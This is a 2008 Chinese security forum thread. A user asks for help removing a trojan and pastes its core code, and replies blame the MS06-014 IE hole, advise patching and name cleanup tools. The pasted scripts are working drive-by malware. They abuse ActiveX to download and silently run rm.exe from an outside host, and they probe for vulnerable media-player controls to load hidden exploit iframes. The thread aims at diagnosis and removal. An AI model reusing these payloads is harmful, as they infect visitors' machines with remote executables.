昨夜风兼雨 2008-7-24 13:41
哎,我被这个破木马 弄疯了,请大家研究下
[color=red]下面提供资料
木马源文件 见 附件 网上收集的资料看
[url]http://hi.baidu.com/286455989/blog/item/1b90562a14f6559e023bf6e1.html[/url]
此人的分析详细但是没有给出解决方案!
其他的人的说法基本不行,我测试了好多木马依然在!请大家帮帮忙!
资料上说影音风暴的一个dll的漏洞!
木马的原型:TrackingCookie.Imrworldwide 貌似变种?[/color]
[b]核心代码[/b]
代码部分[quote]<script>
function gn(rRaGEykU1)
{
var Orh2=window["Math"]["random"]()*rRaGEykU1;
return'~tmp'+'.tmp'
}
try
{
var lengyinzf,lengyinzfs,lengyinzfx;
lengyin='http://ad.50db34d5.info/rm/rm.exe';
Qq730255='C:\\MicroSoft.pif';
lengyin730255='C:\\MicroSoft.vbs';
lengyinzf="Set lengyincn = CreateObject(\"Wscript.Shell\")" + "\n";
lengyinzfs="lengyincn.run \"cmd /c C:\\MicroSoft.bat\",vbhide";
lengyinzfx=lengyinzf+lengyinzfs;
var chilam=window["document"]["createElement"]("object\
chilam["setAttribute"]("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\
lengyincn=gn(10000);
var hHf$R6=chilam["CreateObject"]("Scripting.FileSystemObject","\
var lengyin2=chilam["CreateObject"]("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","\
var lengyin3=chilam["CreateObject"]("Adodb.Stream","\
lengyin3["type"]=1;
var VgDnZXHt7=hHf$R6["GetSpecialFolder"](0);
lengyincn=hHf$R6["BuildPath"](VgDnZXHt7,lengyincn);
var SmAcqIwGV8=chilam["CreateObject"]("Shell.Application","\
exp1=hHf$R6["BuildPath"](VgDnZXHt7+'\\system32','cmd.exe');
SmAcqIwGV8["SHeLlExECuTe"](exp1,' /c echo cmd.exe /c C:\\MicroSoft.pif >C:\\MicroSoft.bat',"","open",0);
lengyin2["open"]("GET",lengyin,0);
lengyin2["send"]();
lengyin3["Open"]();
lengyin3["Write"](lengyin2["responseBody"]);
lengyin3["SaveToFile"](Qq730255,2);
lengyin3["Close"]();
lengyin3["type"]=2;
lengyin3["Open"]();
lengyin3["WriteText"]=lengyinzfx;
lengyin3["Savetofile"](lengyin730255,2);
lengyin3["Close"]();
SmAcqIwGV8["SHeLlExECuTe"](exp1,' /c '+lengyin730255,"","open",0)
}
catch(i)
{i=1}
</script>
<script type="text/jscript">function init() { document.write("\}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
</PRE></BODY>
</script>[/quote]
[quote]<script language="javaScript">
var cook = "silentwm";
function setCookie(name, value, expire)
{
window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
}
function getCookie(Name)
{
var search = Name + "=";
if (window.document.cookie.length > 0)
{
offset = window.document.cookie.indexOf(search);
if (offset != -1)
{
offset += search.length;
end = window.document.cookie.indexOf(";", offset)
if (end == -1)
end = window.document.cookie.length;
return unescape(window.document.cookie.substring(offset, end));
}
}
return null;
}
function register(name)
{
var today = new Date();
var expires = new Date();
expires.setTime(today.getTime() + 1000*60*60*24);
setCookie(cook, name, expires);
}
function openWM()
{
var c = getCookie(cook);
if (c != null)
{
return;
}
register(cook);
window.defaultStatus="完成";
document.write('<iframe width=50 height=0 src=http://free.cjads.info/f/index.htm></iframe>');
try{ var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write('<iframe width=50 height=0 src=http://free.cjads.info/014.htm></iframe>')}
else
{
try{ var j;
var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1\}
catch(j){};
finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
{document.write('<iframe width=100 height=100 src=http://free.cjads.info/real11.htm></iframe>')}
else
{
document.write('<iframe width=100 height=100 src=http://free.cjads.info/real10.htm></iframe>')}}}
try{ var g;
var glworld=new ActiveXObject("GLIEDown.IEDown.1\}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src=http://free.cjads.info/lz.htm></iframe>')}}
try{ var h;
var storm=new ActiveXObject("MPS.StormPlayer.1\}
catch(h){};
finally{if(h!="[object Error]"){
document.write('<iframe style=display:none src=http://free.cjads.info/bf.htm></iframe>')}}
try{ var f;
var thunder=new ActiveXObject("DPClient.Vod\}
catch(f){};
finally{ if(f!="[object Error]"){
document.write('<iframe width=50 height=0 src=http://free.cjads.info/kong.htm></iframe>')}}
}}
}
openWM();
</script>
<script src=http://js.tongji.cn.yahoo.com/621252/ystat.js></script>
[/quote]
[[i] 本帖最后由 昨夜风兼雨 于 2008-7-24 13:42 编辑 [/i]]
僵尸道长 2008-7-25 16:27
用MS06014的IE漏洞挂的马,楼主的机器该打补丁了。
用金山清理专家清除一下病毒吧。
[url]http://client.download.duba.net/KASSetup_10_1.exe[/url]
ljb_ 2008-7-25 16:29
回复 4 楼 僵尸道长的帖子
恩,喜歡道長出來解決問題~:) :)
昨夜风兼雨 2008-7-26 11:15
我自己去试了下~~最新的那个360 顽固木马 专杀工具可以对付~~~~
ynhnqlzyh 2008-10-9 15:45
都知道是漏洞了 你就应该先打好补丁嘛
654478225 2008-10-12 02:59
代码看不懂啊,以后多学习了。
